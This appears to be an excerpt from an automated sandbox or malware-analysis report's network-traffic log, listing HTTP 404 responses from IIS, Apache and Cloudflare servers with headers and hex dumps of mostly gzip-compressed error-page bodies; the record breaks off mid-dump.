Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 31 Aug 2024 12:06:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:16:59 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4765Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 46 72 ff b9 fe 2b b6 8c 13 52 0e 49 90 d4 77 89 52 ca 50 94 c4 8b 24 32 24 e5 ef 2e 1f 08 2e 49 58 20 00 03 4b 49 b4 e3 f7 92 f6 2e f1 b5 76 1c 5f d2 9c dd 26 cd 39 79 2f f6 4b 7a f6 f5 ae 4d 7c 49 9c fe 33 a2 24 ff d4 7f a1 b3 00 41 82 c0 82 a2 e9 84 ba 2b f4 24 11 8b d9 d9 cf cc ce cc ce 2c 01 c4 ff 76 29 93 2c 9c cb a6 50 8d d4 a5 c5 13 71 eb 1f e6 cb 8b 27 10 1c f1 3a 26 3c 12 6a bc a6 63 b2 e0 db 2c 2c 87 66 7c ed 4b 44 24 12 5e 3c f8 d3 f7 07 df 7f d6 ba 7d e7 e0 a3 cf 9e 7d 74 ef f0 f1 e3 38 67 5e b1 31 90 f9 3a 5e f0 69 4a 49 21 ba 0f 09 8a 4c b0 0c ec 64 45 94 cb 78 37 28 2b 15 45 92 94 1d 1f e2 da bd 74 d2 b4 38 d0 83 3b 85 5e e7 75 8c 4e 71 9d a6 92 52 6e a2 6b 9d 53 7a 08 8a a4 68 73 e8 a5 f1 f1 f1 f9 9e 0b 15 18 70 0e 45 a7 d4 5d 74 1a 6b 65 5e e6 83 c8 b7 8a a5 6d 4c 44 81 47 1b b8 81 7d 41 54 b3 1a 82 28 a1 89 bc 14 44 fe 75 51 d0 14 5d a9 10 74 8e 5f c5 a2 3f 88 74 5e d6 43 3a d6 c4 4a ef 10 75 5e ab 8a f2 1c 8a f4 36 ab 7c b9 2c ca 55 68 47 b1 08 0c 4f ff 74 29 ae 77 3e d5 a2 d7 98 ec a2 b4 53 c4 c9 95 ca 13 d2 c5 ab 78 0e c5 66 ec 0c 3b 17 77 b0 58 ad 81 cc 93 11 47 57 49 94 71 a8 d6 be 3a 1e f3 40 13 63 2b 76 22 36 33 23 e0 3e c3 4d 38 87 eb c8 4f 75 1f 61 ab 6c ea 08 11 a3 2e 11 4b 8a 56 c6 5a 08 ac 89 28 75 20 00 06 ba 22 89 65 f4 12 c6 98 29 d0 b8 87 7a 63 4c ed b5 c7 9d ea ab da 92 22 95 59 63 f1 a5 92 e6 50 5f 43 d3 a9 fe c0 c0 d4 5e 86 04 ef 92 50 19 0b 8a c6 13 51 01 40 0d f0 07 8d ce 51 5f ba 90 e1 1e 73 a8 0c 0a c0 6c 10 ec 09 9c 99 a2 3f f3 4c 74 2a 38 23 c1 1a 93 db 5c 4d d9 c6 0e a9 06 c1 de 65 11 36 0c 0f 6b 9a e2 60 53 e2 85 ad aa a6 40 67 c0 57 99 11 4a 42 c9 de bf cb 00 0b 35 05 11 be 24 61 87 db ef 88 65 52 a3 ae 12 79 b9 4f 4f 55 73 f6 eb d8 a6 7b a2 a9 b4 15 08 48 73 88 6f 10 c5 d3 42 66 26 5f ee e3 5d d1 f0 c4 e4 bc 87 ac 21 6b 46 2a d3 f4 87 65 de ae 58 d2 b6 7a 8d 2f 8b 0d 1d 9c 97 69 9d 15 be 2e 4a cd 39 94 54 64 70 09 5e 87 40 b7 26 96 b0 39 47 68 5d 91 15 88 74 eb 58 96 94 20 d0 34 34 11 6b 41 54 87 66 5d e5 05 7c 84 fe 16 fb 69 d1 c3 bb 23 4e 6b b0 07 f5 d4 ae 80 55 03 59 5a ae 28 f6 f0 1e c6 9d 4b 2c d7 0d 11 45 9d f3 8c a6 b6 ce e1 3a d6 75 be 8a bd a6 de 15 00 2c e5 db 82 4a b9 5c 66 ce 84 15 7f 22 48 56 9c 1e db 6b 09 ec 20 6d 18 91 db f8 da dc 41 c2 90 84 2b a4 33 e1 13 7d 08 35 3a 90 37 25 db 34 dc 96 61 59 84 b5 4a fa 5a 3f 3e 3a 7c fa f8 d9 bf fd ea d9 f7 77 7c 1e d6 d1 d5 b5 a0 94 1d 8a 06 27 e2 41 01 54 0e 46 44 e3 25 b1 0a 26 22 e0 de c0 43 8f 8e 7f 54 98 0b ad 29 30 6b fe fa 78 b5 c3 81 dc fa b4 87 a2 d9 d9 d9 a3 4c 4b 07 6d 09 38 e4 96 da be ea 0d 66 5d 7d 42 e2 2c fd 61 87 a7 d0 ae 15 a0 06 47 4a 5d 98 bd 18 ba 3c f5 08 2e 48 91 8e 64 44 8f 7e d9 43 59 d4 55 89 07 a3 14 65 c3 63 4a 92 22 6c 39 26 1c 66 9b 19 e2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:01 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4786Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 54 96 ff 79 f9 2b de 9a 82 1d b0 2d db 49 9c 6f 4e 58 d7 71 12 43 62 1b db 29 2d b4 eb 23 4b cf b6 1a 59 52 a5 e7 7c 69 e9 39 b0 3b 03 cc 6e 4b 61 60 99 76 17 96 29 9c 43 39 b0 d3 ce ce 17 60 80 b2 ff 4c 9d a6 3f ed bf b0 f7 49 96 2d 4b 4f 8e 71 c1 99 59 e5 24 b1 9e ee bb ef 73 ef bb f7 be 7b 9f 25 a5 fe 7e b5 90 a9 9c 2b 66 51 93 b4 e4 95 27 52 f6 3f cc 8b 2b 4f 20 38 52 2d 4c 78 24 34 79 dd c0 64 39 b0 5d 59 8b cc 07 ba 97 88 44 64 bc f2 f0 8f df 3d fc ee e3 ce 8d 77 1f be ff f1 a3 f7 6f 1d dd bb 97 e2 ac 2b 0e 06 0a df c2 cb 01 5d ad a9 c4 08 20 41 55 08 56 80 9d a2 4a 8a 88 f7 c3 8a 5a 57 65 59 dd 0b 20 ae db cb 20 07 36 07 7a 70 cf a0 d3 bc 81 d1 33 5c af a9 a6 8a 07 e8 4a ef 94 1e 82 2a ab fa 22 7a 72 7a 7a 7a 69 e0 42 1d 06 5c 44 f1 a4 b6 8f ce 60 5d e4 15 3e 8c 02 1b 58 de c5 44 12 78 94 c7 6d 1c 08 a3 a6 dd 10 46 69 5d e2 e5 30 0a 6e 49 82 ae 1a 6a 9d a0 73 fc 06 96 82 61 64 f0 8a 11 31 b0 2e d5 07 87 68 f1 7a 43 52 16 51 6c b0 59 e3 45 51 52 1a d0 8e 12 31 18 9e fe e9 53 5c ed 7d 6a c6 af 30 d9 c5 69 a7 98 9b 2b 95 27 62 48 97 f1 22 4a cc 3b 19 f6 2e ee 61 a9 d1 04 99 67 63 ae ae b2 a4 e0 48 b3 7b 75 3a e1 83 26 c1 56 ec 4c 62 7e 5e c0 43 86 9b 71 0f d7 93 9f ea 3e c6 56 59 f2 18 11 e3 1e 11 6b aa 2e 62 3d 02 d6 44 d4 16 10 00 03 43 95 25 11 3d 89 31 66 0a 34 ed a3 de 04 53 7b dd 71 93 43 55 5b 53 65 91 35 16 5f ab e9 2e f5 b5 75 83 ea 0f 0c 4c 1b 64 48 f0 3e 89 88 58 50 75 9e 48 2a 00 6a 83 3f e8 74 8e 86 d2 45 4c f7 58 44 22 28 00 b3 41 b0 27 70 3e 49 7f 96 98 e8 34 70 46 82 75 26 b7 c5 a6 ba 8b 5d 52 8d 82 bd cf 22 6a 1a 1e d6 75 d5 c5 a6 c6 0b 3b 0d 5d 85 ce 80 af 3e 2f d4 84 9a b3 7f 9f 01 16 9a 2a 22 7c 4d c6 2e b7 df 93 44 d2 a4 ae 12 7b 6a 48 4f 4d 77 f7 eb d9 a6 77 a2 a9 b4 75 08 48 8b 88 6f 13 d5 d7 42 e6 67 9f 1a e2 5d f1 e8 cc ec 92 8f ac 11 7b 46 ea 73 f4 87 65 de 9e 58 d2 b5 7a 9d 17 a5 b6 01 ce cb b4 ce 3a df 92 e4 83 45 94 51 15 70 09 de 80 40 b7 29 d5 b0 35 47 68 4b 55 54 88 74 5b 58 91 d5 30 d0 b4 75 09 eb 61 d4 82 66 43 e3 05 7c 8c fe 56 86 69 d1 c7 bb 63 6e 6b 70 06 f5 ec be 80 35 13 59 4e a9 ab ce f0 1e c5 bd 4b 2c d7 8d 10 55 5b f4 8d a6 8e ce d1 16 36 0c be 81 fd a6 de 13 00 6c e5 3b 82 8a 28 8a cc 99 b0 e3 4f 0c 29 aa db 63 07 2d 81 1d a4 4d 23 f2 1a 5f 97 3b 48 18 91 71 9d f4 26 7c 66 08 a1 4e 07 f2 a7 64 9b 86 d7 32 6c 8b b0 57 c9 40 e7 87 bb 47 f7 ef 3d fa 8f 5f 3e fa ee dd 80 8f 75 f4 75 2d a8 a2 4b d1 e0 44 3c 28 80 ca c1 88 68 bc 2c 35 c0 44 04 3c 18 78 e8 d1 f3 8f 3a 73 a1 b5 04 66 cd df 10 af 76 39 90 57 9f ce 50 b4 b0 b0 70 9c 69 19 a0 2d 01 47 bc 52 3b 57 bd d1 ac 6b 48 48 5c a0 3f ec f0 14 d9 b7 03 d4 e8 48 a9 0b b3 17 43 8f a7 1e c3 05 a9 f2 b1 8c e8 31 2c 7b 10 25 43 93 79 30 4a 49 31 3d a6 26 ab c2 8e 6b c2 61 b6 99 21 de
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:04 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 12974Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd bd 79 97 e3 d8 75 27 f8 f7 e8 53 60 d2 b2 33 4b ce 4c 2c 04 41 b0 2a ab 3c d8 17 82 00 89 85 04 69 69 f2 60 07 88 95 d8 49 59 e7 d8 33 dd b6 7a 46 b2 ac b6 c7 2d cd d8 e3 96 7d 8e a5 63 4f 4b 3d bd d8 6a db f2 7c 99 ca aa d2 5f f3 15 06 8c c8 c8 8c 8c 60 64 a5 52 76 56 f7 20 4f 46 10 0f ef dd f7 bb f7 dd f5 05 08 3c f9 ef 69 85 d2 37 0b 06 08 eb 34 f9 e8 4b 4f ae 7e 79 96 fb d1 97 80 e1 78 92 7a b5 05 38 a1 55 56 5e fd e1 3d 43 67 1f e1 f7 9e 5f aa a3 3a f1 3e fa f4 3f fe fd a7 7f ff 67 cf be f3 dd 4f ff e8 cf 7e fe 47 df ff ec 27 3f 79 02 5e 5e b9 46 20 b3 52 ef c3 7b 65 6e e7 75 75 0f 70 f2 ac f6 b2 81 5c 96 47 99 eb f5 0f b3 dc cf 93 24 ef ee 01 e0 f3 51 55 7d b8 a2 70 3a c0 af 00 a4 55 79 c0 57 c0 17 4d 76 ee 1e 80 af bf 38 3d 1d 4e 9e e4 e5 fb c0 af 8c 46 a3 0f 5e b9 e0 0f 13 be 0f c0 58 d1 03 2b af 74 ad cc 7a 08 dc e3 bd a4 f5 ea c8 b1 00 d9 6b bc 7b 0f 81 f0 aa e1 21 40 94 91 95 3c 04 ee cf 23 a7 cc ab dc af 81 8d c5 7b d1 fd 87 40 65 65 d5 a3 ca 2b 23 ff d5 29 52 ab 0c a2 ec 7d 00 7a b5 b9 b0 5c 37 ca 82 a1 1d 40 a0 61 fa d3 8f 97 3d be f1 e2 53 08 7f fd 2c 39 f8 34 08 ba 49 f5 c4 cf a3 2a 3a 7a ef 03 08 7e 9d e0 8b 8b 9d 17 05 e1 c0 f3 18 ba 31 34 89 32 ef 51 f8 fc ea 08 b9 03 0d 72 5e b0 28 82 e3 8e f7 9a e9 d0 9b d3 bd e0 ff 24 7b e8 bc c8 b0 cf 61 11 be c5 a2 9d 97 ae 57 3e 1a b4 a9 ce d3 a1 c3 40 a0 ca 93 c8 05 7e c5 f3 bc b3 0c 8d ee 10 2f 72 56 7a cf e7 c5 5e 2b 5a 3b 4f dc 73 73 59 b6 5d de 10 5f 53 56 27 f9 0d 0a 56 bc 4a b0 f6 fa fa 91 eb 39 79 69 d5 51 3e 00 6a 06 7b 28 4f 6b f4 da 7e 8f 2e cc e3 7d c0 1d 04 e0 9d 07 71 7e 01 71 ec f4 ef 83 b3 e8 8a c1 18 6b af 3c 4b ed fd 30 6f bd 1b 5c bd 09 f6 97 24 1e 5f 28 9e 57 96 f9 0d 32 b6 e5 c4 41 99 0f 83 07 7c 3e ee d8 8e 7d 7d fc 4b 02 9e 13 e6 40 6d d9 89 77 c3 ec bb c8 ad c3 93 a9 40 bf fa 9a 91 45 79 73 dc 0b dd bc bd d0 27 6e fd c1 21 bd 0f 58 4d 9d df a9 21 f8 f8 57 5f 63 5d f0 63 74 fc c1 1d bc 3e ba 5a 11 7f 72 fa 77 4e bd 6f f9 92 e7 5a 5f 5a 6e d4 54 83 f1 9e d5 4e df 4a a3 e4 f0 3e 40 e5 d9 60 12 56 35 38 3a 29 b2 bd cb 35 02 e6 79 96 0f 9e 6e ee 65 49 fe 70 e8 d3 94 91 57 3e 04 d2 a1 b9 2a 2c c7 fb 1c f9 7d f4 3a 29 de 61 dd d0 4d 6d b8 ee d4 99 de f1 8a 0b 64 42 e6 e7 d7 dd fb 63 ef c5 a5 73 a6 fb a8 ce 8b f7 ef f4 a6 d7 06 3f 4e bd aa b2 02 ef ae a5 bf e5 00 ae 84 7f cd a9 b8 ae 7b 76 25 ae fc 0f 04 64 f9 4d 8b 7d 55 13 ce 3b e9 0b 25 ba ad 7c cf a9 0f 1c 3e 4a 3c bf 7e b1 e0 e8 6b 3a 96 a7 89 ee ee 79 5e 35 6e 6b c6 95 46 5c 45 c9 7b cf fe f1 c7 9f fd ec 27 3f ff 3f fe e5 cf ff fe bb f7 ee d0 8e 97 b2 76 72 f7 86 a0 07 23 b2 06 01 9c f8 38 e3 d1 ac 24 0a 06 15 71 bc 57 1d cf e9 78 61 1f fe d9 40 7b c9 f0 b9 f5 7b 8d 55 df 30 a0 db f2 bc ee 8a a6 d3 e9 e7 a9 56 35 48 cb f1 1e dd e6 fa 7a d4 7b 33 ed 7a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:06 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:06:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9aP0izZuYVFphlYWy%2Bq3AMGB2yAsvEFmQG%2BmpDdfTM%2BEbPZhqii3WlRMAJrGnAvC6nukLMdBYk1wtCANeJCdXgv2giSesTUGodsOnx7L4e8rh0md%2FAF%2FjPTaYlAHSOmBDr2XGWI0w4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5c56f4c7d26-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed\|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\\|!+jZAeZq)jAo\|m5ka',Fk6x>DAbU.>y^-RSo6B)m8wln}weQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:07:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SbT6CQAPJlmA5JGRHgMvWp5EKS%2FIs6ab7fKz5XPUHL4pbXCR9VoliCvNbR4BdhoThL8TnVifD%2FRf9g946k%2FegTvlJdDfiQfXk4tvB8Npyor2ITUJvOBZ%2F%2Fe6oF1uFUzmfLdyFykMDj4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5d58e966a52-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed\|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\\|!+jZAeZq)jAo\|m5ka',Fk6x>DAbU.>y^-RSo6B)m8wln}weQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:07:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYAriX6xP8gM%2FYPvnfRxxxNcjpOVRrattKGMXPfM850NrWPTBUECdQcHYnLHZBY5DGLMiPFzuTfRB6xHTcsK9HHMpZWw%2BBICfLMcAO%2B6ldSte92yf62BkMOb6hOADfN05p%2BUu%2BsSasE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5e78bed187d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 